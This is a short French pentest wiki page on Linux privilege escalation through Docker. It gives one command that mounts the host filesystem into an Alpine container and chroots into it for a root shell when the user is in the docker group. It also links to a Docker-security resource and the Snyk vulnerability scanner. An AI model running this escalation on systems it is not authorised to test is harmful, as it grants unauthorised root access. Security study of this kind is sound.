# [Privesc/Linux] Docker

## Introduction

Cette page décrit les techniques utilisées pour monter son niveau de privilège grâce à **docker**.

## [![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2023-10/scaled-1680-/OnMimage.png)](https://wiki.neopipe.fr/uploads/images/gallery/2023-10/OnMimage.png)

## Techniques

#### Utilisateur dans le groupe docker

Si vous avez accès à un compte utilisateur appartenant au **groupe docker** et pouvant exécuter des commandes docker, vous pourrez créer un conteneur qui exécutera un *shell root* grâce à la commande suivante :

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```

Voici un site qui répertorie des techniques pour casser les sécurités de docker

- [https://www.hackitude.in/docker-security](https://www.hackitude.in/docker-security)

## Snyk

[![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2023-10/scaled-1680-/WyJimage.png)](https://wiki.neopipe.fr/uploads/images/gallery/2023-10/WyJimage.png)

Cet outil permet de trouver les vulnérabilités dans les conteneurs docker :

[https://github.com/snyk/cli](https://github.com/snyk/cli)